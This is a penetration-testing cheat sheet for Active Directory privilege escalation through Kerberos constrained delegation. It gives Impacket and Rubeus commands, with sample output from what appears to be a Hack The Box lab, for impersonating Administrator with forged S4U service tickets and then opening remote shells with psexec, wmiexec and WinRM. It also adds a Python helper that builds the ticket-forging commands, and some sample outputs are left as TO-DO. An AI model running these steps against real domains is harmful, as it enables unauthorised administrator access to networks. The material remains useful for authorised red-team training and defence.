Privesc #1: Forge a Ticket (Constrained Delegation: S4U2self + S4U2proxy)
Linux (Impacket)
1. Pre-Check
# With password. Look for DelegationType "Constrained w/ Protocol Transition" (the account can mint a ticket for any user from its own secret) and note the SPN under DelegationRightsTo; plain "Constrained" additionally needs a forwardable ticket from the user being impersonated
impacket-findDelegation '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP>
Sample Output:
TO-DO
# With NT hash (LM half left empty)
impacket-findDelegation '<DOMAIN>/<USER>' -dc-ip <DC_IP> -hashes :<HASH> -no-pass
Sample Output:
TO-DO
2. Get a Service Ticket
# <TARGET_DOMAIN> is the host FQDN from the delegated SPN, not the realm; the clock must be within the DC's skew window, hence ntpdate
# Add -altservice cifs (or host, http, ...) when the delegated SPN is a different service class: the service name is not covered by the ticket's encryption, so getST can rewrite it
sudo ntpdate -s <DC> && impacket-getST -dc-ip <DC_IP> -spn '<SERVICE>/<TARGET_DOMAIN>' -hashes :<HASH> -impersonate '<IMPERSONATE_USER>' '<DOMAIN>/<USER>'
Sample Output:
$ sudo ntpdate -s dc.intelligence.htb && impacket-getST -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :80d4ea8c2d5ccfd1ebac5bd732ece5e4 -impersonate Administrator 'intelligence.htb/svc_int'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@www_dc.intelligence.htb@INTELLIGENCE.HTB.ccache
3. Convert Ticket [Optional]
# Only needed when the ticket came from Rubeus (base64 .kirbi) and is to be used from Linux; impacket-ticketConverter <FILE>.kirbi <FILE>.ccache does the same for an already decoded .kirbi
python3 rubeustoccache.py '<BASE64_TICKET>' '<IMPERSONATE_USER>.kirbi' '<IMPERSONATE_USER>.ccache'
Sample Output:
python3 ~/Tools/RubeusToCcache/rubeustoccache.py 'doIG9DCCBv ...[SNIP]... 9yZS5jb20=' 'administrator.kirbi' 'administrator.ccache'
╦═╗┬ ┬┌┐ ┌─┐┬ ┬┌─┐ ┌┬┐┌─┐ ╔═╗┌─┐┌─┐┌─┐┬ ┬┌─┐
╠╦╝│ │├┴┐├┤ │ │└─┐ │ │ │ ║ │ ├─┤│ ├─┤├┤
╩╚═└─┘└─┘└─┘└─┘└─┘ ┴ └─┘ ╚═╝└─┘┴ ┴└─┘┴ ┴└─┘
By Solomon Sklash
github.com/SolomonSklash
Inspired by Zer1t0's ticket_converter.py
[*] Writing decoded .kirbi file to administrator.kirbi
[*] Writing converted .ccache file to administrator.ccache
[*] All done! Don't forget to set your environment variable: export KRB5CCNAME=administrator.ccache
4. Remote
export KRB5CCNAME='<CCACHE_FILE>'
Sample Output:
$ export KRB5CCNAME=Administrator@www_dc.intelligence.htb@INTELLIGENCE.HTB.ccache
# psexec (target the FQDN that appears in the ticket's SPN; Kerberos authentication fails against an IP address)
sudo ntpdate -s <DC> && impacket-psexec '<DOMAIN>/<IMPERSONATE_USER>@<TARGET_DOMAIN>' -k -no-pass
Sample Output:
$ impacket-psexec client.example.com/administrator@dc01.client.example.com -k -no-pass
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Requesting shares on dc01.client.example.com.....
[*] Found writable share ADMIN$
[*] Uploading file MOjmtmkC.exe
[*] Opening SVCManager on dc01.client.example.com.....
[*] Creating service NTdz on dc01.client.example.com.....
[*] Starting service NTdz.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
# wmiexec
sudo ntpdate -s <DC> && wmiexec.py '<DOMAIN>/<IMPERSONATE_USER>@<TARGET_DOMAIN>' -k -no-pass
Sample Output:
$ sudo ntpdate -s dc.intelligence.htb && wmiexec.py -k -no-pass administrator@dc.intelligence.htb
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
Note: impacket-wmiexec may not work
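Added helper (not from the original cheat sheet and not Impacket's code) that ties the pre-check to step 2: it parses a findDelegation table, keeps only the constrained-delegation rows, and emits the getST command each one calls for, including the -additional-ticket case for accounts listed as plain "Constrained" (no protocol transition), where S4U2self alone returns a non-forwardable ticket that S4U2proxy will not accept. The same distinction applies to the Windows pre-check below (TRUSTED_TO_AUTH_FOR_DELEGATION set vs. msDS-AllowedToDelegateTo alone). The sample table, domain, host names, hash and ccache file name are constructed placeholders.

```python
"""Classify impacket-findDelegation rows and build the matching getST call.

Added example for this cheat sheet: it is not Impacket's code, and the table
below is CONSTRUCTED to look like findDelegation's output (account names,
SPNs and the hash are placeholders). It encodes the check the pre-check step
exists for: an account listed as "Constrained w/ Protocol Transition" can mint
a forwardable S4U2self ticket for any user from its own secret, while plain
"Constrained" cannot and needs a forwardable ticket from the impersonated
user, handed to getST with -additional-ticket.
"""
import re
import shlex

# Constructed sample shaped like `impacket-findDelegation` output; not real data.
SAMPLE_OUTPUT = """\
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliates

AccountName  AccountType  DelegationType                      DelegationRightsTo
-----------  -----------  ----------------------------------  ----------------------------
svc_web      Person       Constrained w/ Protocol Transition  www/dc01.client.example.com
MS01$        Computer     Constrained                         cifs/fs01.client.example.com
MS02$        Computer     Unconstrained                       N/A
"""


def parse_table(text):
    """Return the table rows as dicts keyed by header name.

    findDelegation pads columns with at least two spaces and the only
    multi-word cell ("Constrained w/ Protocol Transition") uses single spaces,
    so splitting on runs of two or more spaces recovers the columns.
    """
    lines = [l.rstrip() for l in text.splitlines()]
    for i, line in enumerate(lines):
        if line.startswith("AccountName"):
            header = re.split(r"\s{2,}", line.strip())
            body = lines[i + 2:]  # skip the dash ruler under the header
            break
    else:
        raise ValueError("no findDelegation table in input")
    rows = []
    for line in body:
        if line.strip():
            cells = re.split(r"\s{2,}", line.strip())
            rows.append(dict(zip(header, cells)))
    return rows


def plan_getst(row, domain, nthash, impersonate="Administrator"):
    """Build the getST command for one constrained-delegation row.

    Returns None for rows this page's flow does not cover (unconstrained,
    resource-based, disabled, or nothing to delegate to).
    """
    dtype, spn = row["DelegationType"], row["DelegationRightsTo"]
    if dtype not in ("Constrained", "Constrained w/ Protocol Transition") or "/" not in spn:
        return None
    service, host = spn.split("/", 1)
    cmd = ["impacket-getST", "-spn", spn, "-impersonate", impersonate, "-hashes", ":" + nthash]
    # The service class in the ticket's sname is not covered by the ticket's encryption,
    # so getST can rewrite it: ask for cifs when the delegated SPN is something else.
    if service.lower() != "cifs":
        cmd += ["-altservice", "cifs"]
    needs_user_ticket = dtype == "Constrained"
    if needs_user_ticket:
        # Without protocol transition S4U2self returns a non-forwardable ticket, which the
        # KDC rejects in S4U2proxy. A forwardable ticket from the impersonated user to this
        # service must be supplied instead (hypothetical file name).
        cmd += ["-additional-ticket", f"{impersonate}_to_{host}.ccache"]
    cmd.append(f"{domain}/{row['AccountName']}")
    return {"account": row["AccountName"], "target_host": host,
            "needs_user_ticket": needs_user_ticket, "getst": cmd}


def plan_all(text, domain, nthash, impersonate="Administrator"):
    """Plan one getST call per usable row of findDelegation output."""
    plans = (plan_getst(r, domain, nthash, impersonate) for r in parse_table(text))
    return [p for p in plans if p is not None]


if __name__ == "__main__":
    # Placeholder domain and NT hash; replace with the values from the pre-check.
    for p in plan_all(SAMPLE_OUTPUT, "client.example.com", "0" * 32):
        print(shlex.join(p["getst"]))
        if p["needs_user_ticket"]:
            print("  # no protocol transition: obtain a forwardable ticket from the user first")
        print(f"  # then: export KRB5CCNAME=<ccache>; impacket-psexec "
              f"client.example.com/Administrator@{p['target_host']} -k -no-pass")
```

Run it against the real `impacket-findDelegation` output piped into `parse_table` to get the exact getST line per account; the printed psexec hint uses the host from the SPN, which is the name the ticket is valid for.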
Windows (Rubeus)
1. Pre-Check
# Import powerview
. .\PowerView.ps1
Sample Output:
TO-DO
# Check msds-allowedtodelegateto on user accounts; repeat with Get-NetComputer -TrustedToAuth for computer accounts (the MS01$ sample below is one)
Get-NetUser -TrustedToAuth
Sample Output:
TO-DO
2. Calculate Hash [Option A: the delegating account's password is known]
# Prints the rc4_hmac and aes256 keys; either one feeds s4u (/rc4 or /aes256)
.\rubeus.exe hash /password:'<PASSWORD>' /user:'<USER>' /domain:<DOMAIN>
Sample Output:
TO-DO
3. Get a Service Ticket
# /altservice is optional: request cifs (SMB), http (WinRM), host, ... when the delegated SPN is a different service class
.\rubeus.exe s4u /user:'<USER>' /aes256:<HASH> /impersonateuser:'<IMPERSONATE_USER>' /domain:<DOMAIN> /msdsspn:'<SERVICE>/<TARGET_DOMAIN>' /altservice:<ALT_SERVICE> /nowrap /ptt
Sample Output:
.\rubeus.exe s4u /user:'MS01$' /rc4:7ddf32e17a6ac5ce04a8ecbf782ca509 /impersonateuser:administrator /msdsspn:"cifs/dc01.client.example.com" /nowrap /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: S4U
[*] Using rc4_hmac hash: 7ddf32e17a6ac5ce04a8ecbf782ca509
[*] Building AS-REQ (w/ preauth) for: 'CLIENT.EXAMPLE.COM\MS01$'
[*] Using domain controller: 172.16.1.2:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFljCCBZKg ...[SNIP]... hPUkUuQ09N
[*] Action: S4U
[*] Building S4U2self request for: 'MS01$@CLIENT.EXAMPLE.COM'
[*] Using domain controller: DC04.CLIENT.EXAMPLE.COM (172.16.1.2)
[*] Sending S4U2self request to 172.16.1.2:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'MS01$@CLIENT.EXAMPLE.COM'
[*] base64(ticket.kirbi):
doIGGjCCBh ...[SNIP]... cbBU1TMDIk
[*] Impersonating user 'administrator' to target SPN 'cifs/dc01.client.example.com'
[*] Building S4U2proxy request for service: 'cifs/dc01.client.example.com'
[*] Using domain controller: DC04.CLIENT.EXAMPLE.COM (172.16.1.2)
[*] Sending S4U2proxy request to domain controller 172.16.1.2:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc01.client.example.com':
doIG9DCCBv ...[SNIP]... 9yZS5jb20=
[+] Ticket successfully imported!
# Or create a sacrificial process and apply the ticket to its logon session (requires an elevated context; add /show to see the window)
.\rubeus.exe s4u /user:'<USER>' /aes256:<HASH> /impersonateuser:'<IMPERSONATE_USER>' /domain:<DOMAIN> /msdsspn:'<SERVICE>/<TARGET_DOMAIN>' /altservice:<ALT_SERVICE> /nowrap /ptt /createnetonly:C:\Windows\System32\cmd.exe
Sample Output:
TO-DO
2. Request a TGT [Option B: code execution as the delegating account, but its key is unknown]
# tgtdeleg extracts a usable TGT for the current logon session through the GSS-API delegation trick; the TGT is already in this session, so there is nothing to inject
.\rubeus.exe tgtdeleg /nowrap
Sample Output:
TO-DO
3. Get a Service Ticket
.\rubeus.exe s4u /user:'<USER>' /ticket:'<BASE64_TICKET>' /impersonateuser:'<IMPERSONATE_USER>' /domain:<DOMAIN> /msdsspn:'<SERVICE>/<TARGET_DOMAIN>' /altservice:<ALT_SERVICE> /nowrap /ptt
Sample Output:
TO-DO
# Or create a sacrificial process and apply the ticket to its logon session (requires an elevated context; add /show to see the window)
.\rubeus.exe s4u /user:'<USER>' /ticket:'<BASE64_TICKET>' /impersonateuser:'<IMPERSONATE_USER>' /domain:<DOMAIN> /msdsspn:'<SERVICE>/<TARGET_DOMAIN>' /altservice:<ALT_SERVICE> /nowrap /ptt /createnetonly:C:\Windows\System32\cmd.exe
Sample Output:
TO-DO
4. Remote
# Check: the cache should hold a ticket for <IMPERSONATE_USER> to the requested SPN
klist
Sample Output:
TO-DO
# Create session (WinRM authenticates to the HTTP/<host> SPN, so the ticket must be for http; use the FQDN from the ticket)
$session = New-PSSession -ComputerName <COMPUTER_NAME>
Sample Output:
TO-DO
# Execute cmd
Invoke-Command -Session $session -ScriptBlock { <CMD> }
Sample Output:
TO-DO